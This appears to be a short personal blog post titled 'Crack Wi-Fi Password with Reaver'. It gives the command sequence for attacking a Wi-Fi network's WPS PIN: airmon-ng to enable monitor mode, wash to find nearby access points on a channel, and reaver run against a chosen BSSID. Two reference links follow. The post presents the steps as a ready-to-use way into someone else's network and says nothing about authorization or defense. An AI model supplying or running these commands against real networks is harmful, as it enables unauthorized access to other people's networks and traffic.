Total Pageviews

Thursday 1 July 2021

Crack Wi-Fi Password with Reaver

We need to switch our device into monitor mode, with airmon-ng.

sudo airmon-ng start wlan0

Then list the nearby hotspots with wash.(Using channel 11 in example)

sudo wash -i wlan0mon -c 11 -C -s

Specify the targeted BSSID and execute the attack.

sudo reaver -i wlan0mon -b xx:15:xx:8B:xx:34 --fail-wait=360

----------

https://gist.github.com/luckypoem/0199128a3d9307e97c24737cac00ca9a

-----------

https://pccr10001.github.io/wpa.html

No comments:

Post a Comment